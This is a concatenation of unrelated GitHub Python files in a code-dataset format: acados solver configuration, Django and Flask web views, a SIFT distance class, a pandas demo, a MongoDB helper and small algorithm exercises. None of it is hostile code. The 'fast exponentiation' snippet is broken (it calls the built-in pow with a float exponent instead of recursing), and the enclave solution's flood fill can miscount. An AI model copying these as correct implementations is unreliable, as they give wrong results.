Exiting.')\n\n @ubu.setter\n def ubu(self, ubu):\n if type(ubu) == np.ndarray:\n self.__ubu = ubu\n else:\n raise Exception('Invalid ubu value. Exiting.')\n \n @idxbu.setter\n def idxbu(self, idxbu):\n if type(idxbu) == np.ndarray:\n self.__idxbu = idxbu\n else:\n raise Exception('Invalid idxbu value. Exiting.')\n\n @lsbx.setter\n def lsbx(self, lsbx):\n if type(lsbx) == np.ndarray:\n self.__lsbx = lsbx\n else:\n raise Exception('Invalid lsbx value. Exiting.')\n\n @usbx.setter\n def usbx(self, usbx):\n if type(usbx) == np.ndarray:\n self.__usbx = usbx\n else:\n raise Exception('Invalid usbx value. Exiting.')\n\n @idxsbx.setter\n def idxsbx(self, idxsbx):\n if type(idxsbx) == np.ndarray:\n self.__idxsbx = idxsbx\n else:\n raise Exception('Invalid idxsbx value. Exiting.')\n\n @lsbu.setter\n def lsbu(self, lsbu):\n if type(lsbu) == np.ndarray:\n self.__lsbu = lsbu\n else:\n raise Exception('Invalid lsbu value. Exiting.')\n\n @usbu.setter\n def usbu(self, usbu):\n if type(usbu) == np.ndarray:\n self.__usbu = usbu\n else:\n raise Exception('Invalid usbu value. Exiting.')\n \n @idxsbu.setter\n def idxsbu(self, idxsbu):\n if type(idxsbu) == np.ndarray:\n self.__idxsbu = idxsbu\n else:\n raise Exception('Invalid idxsbu value. Exiting.')\n\n @lsh.setter\n def lsh(self, lsh):\n if type(lsh) == np.ndarray:\n self.__lsh = lsh\n else:\n raise Exception('Invalid lsh value. Exiting.')\n\n @ush.setter\n def ush(self, ush):\n if type(ush) == np.ndarray:\n self.__ush = ush\n else:\n raise Exception('Invalid ush value. Exiting.')\n\n @idxsh.setter\n def idxsh(self, idxsh):\n if type(idxsh) == np.ndarray:\n self.__idxsh = idxsh\n else:\n raise Exception('Invalid idxsh value. Exiting.')\n\n @lsbx_e.setter\n def lsbx_e(self, lsbx_e):\n if type(lsbx_e) == np.ndarray:\n self.__lsbx_e = lsbx_e\n else:\n raise Exception('Invalid lsbx_e value. Exiting.')\n\n @usbx_e.setter\n def usbx_e(self, usbx_e):\n if type(usbx_e) == np.ndarray:\n self.__usbx_e = usbx_e\n else:\n raise Exception('Invalid usbx_e value. Exiting.')\n\n @idxsbx_e.setter\n def idxsbx_e(self, idxsbx_e):\n if type(idxsbx_e) == np.ndarray:\n self.__idxsbx_e = idxsbx_e\n else:\n raise Exception('Invalid idxsbx_e value. Exiting.')\n\n @lsh_e.setter\n def lsh_e(self, lsh_e):\n if type(lsh_e) == np.ndarray:\n self.__lsh_e = lsh_e\n else:\n raise Exception('Invalid lsh_e value. Exiting.')\n\n @ush_e.setter\n def ush_e(self, ush_e):\n if type(ush_e) == np.ndarray:\n self.__ush_e = ush_e\n else:\n raise Exception('Invalid ush_e value. Exiting.')\n\n @idxsh_e.setter\n def idxsh_e(self, idxsh_e):\n if type(idxsh_e) == np.ndarray:\n self.__idxsh_e = idxsh_e\n else:\n raise Exception('Invalid idxsh_e value. Exiting.')\n\n @lg.setter\n def lg(self, lg):\n if type(lg) == np.ndarray:\n self.__lg = lg\n else:\n raise Exception('Invalid lg value. Exiting.')\n\n @ug.setter\n def ug(self, ug):\n if type(ug) == np.ndarray:\n self.__ug = ug\n else:\n raise Exception('Invalid ug value. Exiting.')\n\n @lh.setter\n def lh(self, lh):\n if type(lh) == np.ndarray:\n self.__lh = lh\n else:\n raise Exception('Invalid lh value. Exiting.')\n\n @uh.setter\n def uh(self, uh):\n if type(uh) == np.ndarray:\n self.__uh = uh\n else:\n raise Exception('Invalid uh value. Exiting.')\n\n @D.setter\n def D(self, D):\n if type(D) == np.ndarray:\n self.__D = D\n else:\n raise Exception('Invalid D value. Exiting.')\n\n @C.setter\n def C(self, C):\n if type(C) == np.ndarray:\n self.__C = C\n else:\n raise Exception('Invalid C value. 
Exiting.')\n\n    @C_e.setter\n    def C_e(self, C_e):\n        if type(C_e) == np.ndarray:\n            self.__C_e = C_e\n        else:\n            raise Exception('Invalid C_e value. Exiting.')\n\n    @lbx_e.setter\n    def lbx_e(self, lbx_e):\n        if type(lbx_e) == np.ndarray:\n            self.__lbx_e = lbx_e\n        else:\n            raise Exception('Invalid lbx_e value. Exiting.')\n\n    @ubx_e.setter\n    def ubx_e(self, ubx_e):\n        if type(ubx_e) == np.ndarray:\n            self.__ubx_e = ubx_e\n        else:\n            raise Exception('Invalid ubx_e value. Exiting.')\n\n    @idxbx_e.setter\n    def idxbx_e(self, idxbx_e):\n        if type(idxbx_e) == np.ndarray:\n            self.__idxbx_e = idxbx_e\n        else:\n            raise Exception('Invalid idxbx_e value. Exiting.')\n\n    @x0.setter\n    def x0(self, x0):\n        if type(x0) == np.ndarray:\n            self.__x0 = x0\n        else:\n            raise Exception('Invalid x0 value. Exiting.')\n\n    @p.setter\n    def p(self, p):\n        if type(p) == np.ndarray:\n            self.__p = p\n        else:\n            raise Exception('Invalid p value. Exiting.')\n\n    def set(self, attr, value):\n        setattr(self, attr, value)\n\nclass ocp_nlp_solver_config:\n    \"\"\"\n    class containing the description of the solver configuration\n    \"\"\"\n    def __init__(self):\n        self.__qp_solver = 'PARTIAL_CONDENSING_HPIPM' #: qp solver to be used in the NLP solver\n        self.__hessian_approx = 'GAUSS_NEWTON' #: hessian approximation\n        self.__integrator_type = 'ERK' #: integrator type\n        self.__tf = None #: prediction horizon\n        self.__nlp_solver_type = 'SQP_RTI' #: NLP solver \n\n    @property\n    def qp_solver(self):\n        return self.__qp_solver\n\n    @property\n    def hessian_approx(self):\n        return self.__hessian_approx\n\n    @property\n    def integrator_type(self):\n        return self.__integrator_type\n\n    @property\n    def nlp_solver_type(self):\n        return self.__nlp_solver_type\n\n    @qp_solver.setter\n    def qp_solver(self, qp_solver):\n        qp_solvers = ('PARTIAL_CONDENSING_HPIPM', 'PARTIAL_CONDENSING_QPOASES', \\\n            'FULL_CONDENSING_QPOASES', 'FULL_CONDENSING_HPIPM')\n\n        if type(qp_solver) == str and qp_solver in qp_solvers:\n            self.__qp_solver = qp_solver\n        else:\n            raise Exception('Invalid qp_solver value. Possible values are:\\n\\n' \\\n                + ',\\n'.join(qp_solvers) + '.\\n\\nYou have: ' + qp_solver + '.\\n\\nExiting.')\n    @property\n    def tf(self):\n        return self.__tf\n\n    @hessian_approx.setter\n    def hessian_approx(self, hessian_approx):\n        hessian_approxs = ('GAUSS_NEWTON',)\n\n        if type(hessian_approx) == str and hessian_approx in hessian_approxs:\n            self.__hessian_approx = hessian_approx\n        else:\n            raise Exception('Invalid hessian_approx value. Possible values are:\\n\\n' \\\n                + ',\\n'.join(hessian_approxs) + '.\\n\\nYou have: ' + hessian_approx + '.\\n\\nExiting.')\n\n    @integrator_type.setter\n    def integrator_type(self, integrator_type):\n        integrator_types = ('ERK', 'IRK')\n\n        if type(integrator_type) == str and integrator_type in integrator_types:\n            self.__integrator_type = integrator_type\n        else:\n            raise Exception('Invalid integrator_type value. Possible values are:\\n\\n' \\\n                + ',\\n'.join(integrator_types) + '.\\n\\nYou have: ' + integrator_type + '.\\n\\nExiting.')\n\n    @tf.setter\n    def tf(self, tf):\n        self.__tf = tf\n\n    @nlp_solver_type.setter\n    def nlp_solver_type(self, nlp_solver_type):\n        nlp_solver_types = ('SQP', 'SQP_RTI')\n\n        if type(nlp_solver_type) == str and nlp_solver_type in nlp_solver_types:\n            self.__nlp_solver_type = nlp_solver_type\n        else:\n            raise Exception('Invalid nlp_solver_type value. 
Possible values are:\n\n' \\\n                + ',\\n'.join(nlp_solver_types) + '.\\n\\nYou have: ' + nlp_solver_type + '.\\n\\nExiting.')\n\n    def set(self, attr, value):\n        setattr(self, attr, value)\n\nclass acados_ocp_nlp:\n    \"\"\"\n    class containing the full description of the optimal control problem\n    \"\"\"\n    def __init__(self):\n        self.dims = ocp_nlp_dims()\n        self.cost = ocp_nlp_cost()\n        self.constraints = ocp_nlp_constraints()\n        self.solver_config = ocp_nlp_solver_config()\n        self.model_name = None \n        self.con_p_name = None \n        self.con_p_e_name = None \n        self.con_h_name = None \n        self.con_h_e_name = None \n        # self.constants = {}\n        self.acados_include_path = []\n        self.acados_lib_path = []\n\n    def set(self, attr, value):\n        # tokenize string \n        tokens = attr.split('_', 1)\n        if len(tokens) > 1:\n            setter_to_call = getattr(getattr(self, tokens[0]), 'set')\n            setter_to_call(tokens[1], value)\n        else:\n            setattr(self, attr, value)\n\n        return \n\ndef check_ra(ra):\n    \"\"\"\n    (DEPRECATED) function that checks the consistency of the optimal control description\n    \"\"\"\n    # TODO(andrea): dimensions check are already performed \n    # on the JSON data and type checks should be enforced by the \n    # property setters. Add extra checks here?\n    return\n\ndef np_array_to_list(np_array):\n    return np_array.tolist()\n\nclass ocp_nlp_as_object:\n    def __init__(self, d):\n        self.__dict__ = d\n\ndef dict2json(d):\n    out = {}\n    for k, v in d.items():\n        if isinstance(v, dict):\n            v = dict2json(v)\n\n        v_type = str(type(v).__name__)\n        # out_key = '__' + v_type + '__' + k.split('__', 1)[-1]\n        out_key = k.split('__', 1)[-1]\n        out[k.replace(k, out_key)] = v\n    return out\n\ndef acados_ocp2json_layout(acados_ocp):\n    \"\"\" Convert acados ocp nlp object to JSON format by stripping the \n    property mangling and adding array dimension info.\n    ALL items of type String will be converted \n    to type ndarray!\n    \n    Parameters\n    ----------\n    acados_ocp : class\n        object of type acados_ocp_nlp.\n    \n    Returns\n    ------\n    out: dict \n        acados_layout\n    \"\"\"\n    ocp_nlp = acados_ocp\n    ocp_nlp.cost = acados_ocp.cost.__dict__\n    ocp_nlp.constraints = acados_ocp.constraints.__dict__\n    ocp_nlp.solver_config = acados_ocp.solver_config.__dict__\n    ocp_nlp.dims = acados_ocp.dims.__dict__\n    ocp_nlp = ocp_nlp.__dict__\n    json_layout = dict2json_layout(ocp_nlp)\n    return json_layout\n\ndef dict2json_layout(d):\n    \"\"\" Convert dictionary containing the description \n    of the ocp_nlp to JSON format by stripping the \n    property mangling and adding array dimension info.\n    ALL items of type String will be converted \n    to type ndarray!\n    \n    Parameters\n    ----------\n    d : dict\n        dictionary containing the description of \n        the ocp_nlp.\n    \n    Returns\n    ------\n    out: dict \n        postprocessed dictionary.\n    \"\"\"\n    out = {}\n    for k, v in d.items():\n        if isinstance(v, dict):\n            v = dict2json_layout(v)\n\n        v_type = str(type(v).__name__)\n        if v_type == 'list':\n            v_type = 'ndarray'\n\n        # add array number of dimensions?\n        # if v_type == 'ndarray':\n        #     v_type = v_type + '_' + str(len(v.shape))\n        out_key = k.split('__', 1)[-1]\n\n        if isinstance(v, dict):\n            out[k.replace(k, out_key)] = v \n        else:\n            out[k.replace(k, out_key)] = [v_type] \n    \n    return out\n\ndef cast_ocp_nlp(ocp_nlp, ocp_nlp_layout):\n    \"\"\" MATLAB does not allow distinction between e.g a = [1,1,1] and b = [1,1,1].' \n    or a = 1 and b = [1]. 
Hence, we need to do some postprocessing of the JSON \n file generated from MATLAB.\n \n Parameters\n ----------\n ocp_nlp : dict\n ocp_nlp dictionary to be postprocessed.\n \n ocp_nlp_layout : dict\n acados ocp_nlp target layout\n Returns\n ------\n out : dict\n postprocessed dictionary\n \"\"\"\n\n out = {}\n for k, v in ocp_nlp.items():\n if isinstance(v, dict):\n v = cast_ocp_nlp(v, ocp_nlp_layout[k])\n\n if 'ndarray' in ocp_nlp_layout[k]:\n if isinstance(v, int) or isinstance(v, float):\n v = np.array([v])\n out[k] = v\n return out \n\ndef json2dict(ocp_nlp, ocp_nlp_dims):\n # load JSON layout\n current_module = sys.modules[__name__]\n acados_path = os.path.dirname(current_module.__file__)\n with open(acados_path + '/acados_layout.json', 'r') as f:\n ocp_nlp_layout = json.load(f)\n\n out = json2dict_rec(ocp_nlp, ocp_nlp_dims, ocp_nlp_layout)\n return out\n\ndef json2dict_rec(ocp_nlp, ocp_nlp_dims, ocp_nlp_layout):\n \"\"\" convert ocp_nlp loaded JSON to dictionary. Mainly convert\n lists to arrays for easier handling.\n Parameters\n ---------\n ocp_nlp : dict \n dictionary loaded from JSON to be post-processed.\n \n ocp_nlp_dims : dict \n dictionary containing the ocp_nlp dimensions.\n\n ocp_nlp_layout : dict \n acados ocp_nlp layout.\n\n Returns\n -------\n out : dict \n post-processed dictionary.\n \"\"\"\n out = {}\n for k, v in ocp_nlp.items():\n if isinstance(v, dict):\n v = json2dict_rec(v, ocp_nlp_dims, ocp_nlp_layout[k])\n\n v_type__ = str(type(v).__name__)\n out_key = k.split('__', 1)[-1]\n v_type = out_key.split('__')[0]\n out_key = out_key.split('__', 1)[-1]\n if 'ndarray' in ocp_nlp_layout[k]:\n if isinstance(v, int) or isinstance(v, float):\n v = np.array([v])\n if v_type == 'ndarray' or v_type__ == 'list':\n dims_l = []\n dims_names = []\n dim_keys = ocp_nlp_layout[k][1]\n for item in dim_keys:\n dims_l.append(ocp_nlp_dims[item])\n dims_names.append(item)\n dims = tuple(dims_l)\n if v == []:\n # v = None\n try: \n v = np.reshape(v, dims)\n except: \n raise Exception('acados -- mismatching dimensions for field {0}. Provided data has dimensions {1}, while associated dimensions {2} are {3}'.format(out_key, [], dims_names, dims))\n # v = []\n else:\n v = np.array(v)\n v_dims = v.shape\n try: \n v = np.reshape(v, dims)\n except: \n raise Exception('acados -- mismatching dimensions for field {0}. 
Provided data has dimensions {1}, while associated dimensions {2} are {3}'.format(out_key, v_dims, dims_names, dims))\n        out[k.replace(k, out_key)] = v\n    return out\n","repo_name":"besticka/acados1","sub_path":"interfaces/acados_template/acados_template/acados_ocp_nlp.py","file_name":"acados_ocp_nlp.py","file_ext":"py","file_size_in_byte":34783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73662797163","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.views.generic import ListView, DetailView, CreateView\nfrom django.http import HttpResponse\nfrom django.contrib.auth.mixins import LoginRequiredMixin\n\nfrom .models import News, Category\nfrom .forms import NewsForm, UserRegisterForm\nfrom django.urls import reverse_lazy\nfrom django.core.paginator import Paginator\nfrom django.contrib import messages\n\n\ndef register(request):\n    if request.method == 'POST':\n        form = UserRegisterForm(request.POST)\n        if form.is_valid():\n            form.save()\n            messages.success(request, 'You have successfully registered')\n            return redirect('login')\n        else:\n            messages.error(request, 'Registration error')\n    else:\n        form = UserRegisterForm()\n    return render(request, 'news/register.html', {"form": form})\n\n\ndef login(request):\n    return render(request, 'news/login.html')\n\n\ndef test(request):\n    objects = ['john1', 'paul2', 'george3', 'ringo4', 'john5', 'paul6', 'george7']\n    paginator = Paginator(objects, 2)\n    page_num = request.GET.get('page', 1)\n    page_objects = paginator.get_page(page_num)\n    return render(request, 'news/test.html', {'page_obj': page_objects})\n\nclass HomeNews(ListView):\n    model = News\n    template_name = 'news/home_news_list.html' # page template\n    context_object_name = 'news' # passing static data\n    # extra_context = {"title": "Home"}\n    paginate_by = 2\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        \"\"\" Passing dynamic data \"\"\"\n        context = super().get_context_data(**kwargs)\n        context['title'] = 'Home page'\n        return context\n\n    def get_queryset(self):\n        \"\"\" Refining the query by filtering the data \"\"\"\n        return News.objects.filter(is_bublished=True).select_related('category')\n\n\n\nclass NewsByCategory(ListView):\n    model = News\n    template_name = 'news/home_news_list.html' # page template\n    context_object_name = 'news' # passing static data\n    allow_empty = False # disallow an empty list\n\n    def get_context_data(self, *, object_list=None, **kwargs):\n        \"\"\" Passing dynamic data \"\"\"\n        context = super().get_context_data(**kwargs)\n        context['title'] = Category.objects.get(pk=self.kwargs['category_id'])\n        return context\n\n    def get_queryset(self):\n        \"\"\" Refining the query by filtering the data \"\"\"\n        return News.objects.filter(category_id=self.kwargs['category_id'],\n                                   is_bublished=True)\n\n\nclass ViewNews(DetailView):\n    model = News\n    context_object_name = 'news_item' # passing static data\n    # template_name = 'news/news_detail.html'\n    # pk_url_kwarg = 'news_id'\n\nclass CreateNews(LoginRequiredMixin, CreateView):\n    '''News creation class'''\n    form_class = NewsForm\n    template_name = 'news/add_news.html'\n    # success_url = reverse_lazy('main') # option to redirect to the main page after the news is published\n\ndef index(request):\n    news = News.objects.all()\n    context = {\n        'news': news,\n        'title': 'News list',\n    }\n    return render(request, 'news/index.html', context)\n\n\n# def get_category(request, category_id):\n#     news = 
News.objects.filter(category_id=category_id)\n#     category = Category.objects.get(pk=category_id)\n#     context = {\n#         'news': news,\n#         'category': category\n#     }\n#     return render(request, 'news/category.html', context)\n\n\ndef view_news(request, news_id):\n    # news_item = News.objects.get(pk=news_id)\n    news_item = get_object_or_404(News, pk=news_id)\n    context = {\n        'item': news_item\n    }\n    return render(request, 'news/view_news.html', context)\n\n# def add_news(request):\n#     if request.method == 'POST':\n#         form = NewsForm(request.POST)\n#         if form.is_valid():\n#             # print(form.cleaned_data)\n#             # news = News.objects.create(**form.cleaned_data)\n#             news = form.save()\n#             return redirect(news)\n#     else:\n#         form = NewsForm()\n#\n#     context = {\n#         "form": form\n#     }\n\n#     return render(request, 'news/add_news.html', context)","repo_name":"Maglctea/WebBlog","sub_path":"mysite/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74322923243","text":"# -*- coding: utf-8 -*-\n\"\"\"Computes pairwise distances for SIFT histograms, python implementation.\n\"\"\"\n\n#from wibc.config.wibc_config import cf\nimport numpy as np\nimport cPickle\n\n\nclass sift_pdist(object):\n    \n    def __init__(self, Dname):\n        \"\"\"Loading data to memory.\n        \"\"\"\n        self.D = cPickle.load(open(Dname, 'rb'))\n    \n    def getA(self, N, THR=2):\n        \"\"\"Get thresholded weighting matrix.\n        \n        Uses best settings from the article, THR=2.\n        \"\"\"\n        A = np.zeros((N,N), dtype=np.float64)\n        for i in xrange(N):\n            for j in xrange(max(0, i-THR+1), min(N, i+THR)):\n                A[i,j] = 1 - float(abs(i-j))/THR\n        return A\n    \n    def get_dist(self, P, Q, K, m=0.5):\n        \"\"\"Distance function using np.argsort.\n        \"\"\"\n        A = self.getA(P.shape[0])\n        Z = (P+Q).dot(A)\n        Z = Z**m\n        Z[Z==0] = 1\n        D = (P-Q)/Z\n        # calc only diagonal of dot operation, for multiple vectors at a time\n        DA = D.dot(A)\n        dist = np.einsum('ij,ji->i', DA, D.T)**0.5\n        # getting the closest K members\n        k_idx = np.argsort(dist)[:K]\n        k_dist = dist[k_idx]\n        return [k_idx, k_dist, np.mean(dist), np.std(dist)]\n\n    def get_dist_1k(self, Pi):\n        \"\"\"Get 1000 closest neighbours of descriptor Pi.\n        \"\"\"\n        P = self.D[Pi]\n        res = [[] for _ in range(4)]\n        res[0] = np.empty((0,))\n        res[1] = np.empty((0,))\n        for k in xrange(22):\n            Q = self.D[k*50000:(k+1)*50000, :]\n            r1 = self.get_dist(P, Q, K=1000)\n            r1[0] += k*50000\n            res[0] = np.hstack((res[0], r1[0]))\n            res[1] = np.hstack((res[1], r1[1]))\n            res[2].append(r1[2])\n            res[3].append(r1[3])\n        idx = np.argsort(res[1])[:1000]\n        res[0] = res[0][idx]\n        res[1] = res[1][idx]\n        res[2] = np.mean(res[2])\n        res[3] = np.mean(res[3])\n        #return [k_idx, k_dist, np.mean(dist), np.std(dist)]\n        return res","repo_name":"akusok/website-ibc","sub_path":"wibc/modules/sift_pdist.py","file_name":"sift_pdist.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71599661163","text":"# Pandas -- pip install pandas\n\n\n# filtration\n# analysis of data \n\nimport pandas \n\n# data = ["Ramesh","Suresh","Mahesh","venkatesh",'rajesh','subash','vignesh']\n\n# info = pandas.DataFrame(data)\n\n# print(info)\n\n# print(type(info))\n\n# dict1 = {\n#     "teams":["CSK","RCB","MI","LSG"],\n#     "players":["Dhoni","Kohli","Rohit","Rahul"]\n# }\n\n# info = pandas.DataFrame(dict1)\n\n# print(info)\n\n# print(type(info))\n\n# read_csv\n# read_excel\n# 
read_json\ncsv_data = pandas.read_csv('sample_data.csv')\n\n# print(csv_data)\n\n# print(csv_data.loc[0:2]) # row based access.\n\n# print(csv_data.loc[[0,1,4]])\n\n# print(csv_data['name']) # column based access\n\n# print(csv_data)\n\ninfo = csv_data[csv_data['city']=='Hyderabad']\n\nprint(info)\n\n# info.to_csv("filtered_data.csv",index=False)\n\ninfo.to_excel('sample.xlsx',index=False)\n\ninfo.to_json('sample_info.json',index=False,indent=4,orient='records')","repo_name":"sanjeevareddy91/python-8am-oct-2023","sub_path":"pandas_cls.py","file_name":"pandas_cls.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42278899753","text":"from flask import Flask, render_template, redirect, url_for, request\nfrom flask_bootstrap import Bootstrap\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, FloatField\nfrom wtforms.validators import DataRequired\nimport requests\nimport os\n\nAPI_KEY = os.environ.get("MY_API_KEY")\n\nAPI_URL = "https://api.themoviedb.org/3/search/movie"\nMOVIE_DB_IMAGE_URL = "https://image.tmdb.org/t/p/w500"\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'SECRET_APP_KEY'\nBootstrap(app)\n\n# CREATE DATABASE\napp.config['SQLALCHEMY_DATABASE_URI'] = "sqlite:///movie-collection.db"\n# Optional: But it will silence the deprecation warning in the console.\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\ndb = SQLAlchemy(app)\n\n\nclass AddMovie(FlaskForm):\n    title = StringField(label="Movie Title", validators=[DataRequired()])\n    submit = SubmitField(label="Add Movie")\n\n# created a class using FlaskForm\nclass RateMovieForm(FlaskForm):\n    # label is what will be displayed\n    rating = FloatField(label="Your rating out of 10 e.g 7.5", validators=[DataRequired()])\n    review = StringField(label="Your review", validators=[DataRequired()])\n    submit = SubmitField(label="Done")\n\n\n# CREATE TABLE\nclass Movies(db.Model):\n    id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n    title = db.Column(db.String(250), unique=True, nullable=False)\n    year = db.Column(db.Integer, nullable=False)\n    description = db.Column(db.String(350), nullable=False)\n    rating = db.Column(db.Float, nullable=True)\n    ranking = db.Column(db.Integer, nullable=True)\n    review = db.Column(db.String(500), nullable=True)\n    img_url = db.Column(db.String(500), nullable=False)\n\n# Allow each movie object to be identified by its title when printed.\n    def __repr__(self):\n        return f'<Movies {self.title}>'\n\n\nwith app.app_context():\n    db.create_all()\n\n\n@app.route("/")\ndef home():\n\n    # This line creates a list of all the movies sorted by rating\n    all_movies = Movies.query.order_by(Movies.rating).all()\n    rows = Movies.query.count()\n    # This line loops through all the movies\n    for i in range(len(all_movies)):\n        # This line gives each movie a new ranking reversed from their order in all_movies\n        all_movies[i].ranking = len(all_movies) - i\n    db.session.commit()\n    return render_template("index.html", num_of_movies=rows, movies=all_movies)\n\n\n@app.route("/edit", methods=["GET", "POST"])\ndef rate_movie():\n    form = RateMovieForm()\n    movie_id = request.args.get("id")\n    movie_selected = Movies.query.get(movie_id)\n    if request.method == "POST":\n        # UPDATE RECORD\n        movie_to_update = Movies.query.get(movie_id)\n        movie_to_update.rating = request.form["rating"]\n        movie_to_update.review = request.form["review"]\r\n 
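# persist the updated rating and review before redirecting home\r\n 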
db.session.commit()\n return redirect(url_for('home'))\n return render_template(\"edit.html\", form=form, movie=movie_selected)\n\n\n@app.route(\"/delete\")\ndef delete():\n movie_id = request.args.get('id')\n movie_to_delete = Movies.query.get(movie_id)\n db.session.delete(movie_to_delete)\n db.session.commit()\n return redirect(url_for('home'))\n\n\n@app.route(\"/add\", methods=[\"GET\", \"POST\"])\ndef add_movie():\n form = AddMovie()\n if request.method == \"POST\":\n parameters = {\n \"api_key\": API_KEY,\n \"query\": form.title.data,\n }\n movies_response = requests.get(url=API_URL, params=parameters).json()\n print(movies_response)\n return render_template(\"select.html\", form=form, movies=movies_response, key=API_KEY)\n return render_template(\"add.html\", form=form)\n\n\n@app.route(\"/find\")\ndef find_movie():\n movie_api_id = request.args.get(\"id\")\n if movie_api_id:\n movie_api_url = f\"https://api.themoviedb.org/3/movie/{movie_api_id}\"\n response = requests.get(movie_api_url, params={\"api_key\": API_KEY, \"language\": \"en-US\"})\n data = response.json()\n print(data)\n new_movie = Movies(\n title=data[\"title\"],\n year=data[\"release_date\"].split(\"-\")[0],\n img_url=f\"{MOVIE_DB_IMAGE_URL}{data['poster_path']}\",\n description=data[\"overview\"]\n )\n\n db.session.add(new_movie)\n db.session.commit()\n return redirect(url_for(\"rate_movie\", id=new_movie.id))\n\n\nif __name__ == '__main__':\n app.run(port=4999, debug=True)","repo_name":"mayrapena1324/top-ten-movies","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74483582442","text":"from DBConnect import *\nclass DocActions(object):\n\tdef __init__(self,medium):\n\t\t#0 youtube 1 vimeo\n\t\tself.medium=medium\n\tdef getAll(self):\n\t\tdb=DBConnect(\"meteor\")\n\t\tif self.medium==0:\n\t\t\tcursor = db.connect().randa_youtube_videos.find()\n\t\telif self.medium==1:\n\t\t\tcursor = db.connect().randa_vimeo_videos.find()\n\t\tfor document in cursor:\n\t\t\tprint(document)\n\tdef deleteAll(self):\n\t\tdb=DBConnect(\"meteor\")\n\t\tif self.medium==0:\n\t\t\tdb.connect().randa_youtube_videos.remove({})\n\t\telif self.medium==1:\n\t\t\tdb.connect().randa_vimeo_videos.remove({})\n\tdef createUniqueIndex(self):\n\t\tdb=DBConnect(\"meteor\")\n\t\tif self.medium==0:\n\t\t\tdb.connect().randa_youtube_videos.create_index([(\"randa_id\", 1)], unique=True)\n\t\telif self.medium==1:\n\t\t\tdb.connect().randa_vimeo_videos.create_index([(\"randa_id\", 1)], unique=True)","repo_name":"kaplanmaxe/randapanda","sub_path":"python/DocActions.py","file_name":"DocActions.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71950328364","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Using Recusrsive approach\ndef power(a, N):\n if(N==0):\n return 1;\n elif N==1:\n return a;\n else:\n R = pow(a, N/2)\n if(N%2==0):\n return R*R;\n else:\n return R*a*R;\n \na = int(input(\"Enter a:\",))\nN = int(input(\"Enter N:\",))\npower(a, N)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"manasupes/Coding-Problems","sub_path":"Fast_Exp.py","file_name":"Fast_Exp.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20238947130","text":"# 1020. 
Number of Enclaves\n\n# You are given an m x n binary matrix grid, where 0 represents a sea cell and 1 represents a land cell.\n\n# A move consists of walking from one land cell to another adjacent (4-directionally) land cell or walking off the boundary of the grid.\n\n# Return the number of land cells in grid for which we cannot walk off the boundary of the grid in any number of moves.\n\n# Example 1:\n# Input: grid = [[0,0,0,0],[1,0,1,0],[0,1,1,0],[0,0,0,0]]\n# Output: 3\n# Explanation: There are three 1s that are enclosed by 0s, and one 1 that is not enclosed because its on the boundary.\n\n# Example 2:\n# Input: grid = [[0,1,1,0],[0,0,1,0],[0,0,1,0],[0,0,0,0]]\n# Output: 0\n# Explanation: All 1s are either on the boundary or can reach the boundary.\n\nfrom typing import List\n\n\nclass Solution:\n def numEnclaves(self, grid: List[List[int]]) -> int:\n directions = [\n [1, 0],\n [-1, 0],\n [0, 1],\n [0, -1],\n ]\n result = 0\n flag = True\n\n def recursive(i, j, count: List[str]):\n nonlocal flag\n if i < 0 or i >= len(grid) or j < 0 or j >= len(grid[0]):\n return\n if grid[i][j] == 0:\n return\n if i == 0 or i == len(grid)-1 or j == 0 or j == len(grid[0]) - 1:\n flag = False\n return\n count.append(f\"row{i}-col{j}\")\n grid[i][j] = 0\n for item in directions:\n recursive(i + item[0], j + item[1], count)\n\n for i in range(0, len(grid)):\n for j in range(0, len(grid[0])):\n if grid[i][j] == 1:\n count = []\n flag = True\n recursive(i, j, count)\n if flag:\n result = result + len(count)\n\n return result\n\n\n# test\ngrid = [\n [0, 1, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 0],\n]\nsolution = Solution()\nres = solution.numEnclaves(grid)\nprint(res)\n","repo_name":"HarryXiong24/code-collection","sub_path":"Data Structure & Algorithm/Algorithm/Search on 2-dimension Plane/DFS/1020. Number of Enclaves/1020. Number of Enclaves.py","file_name":"1020. 
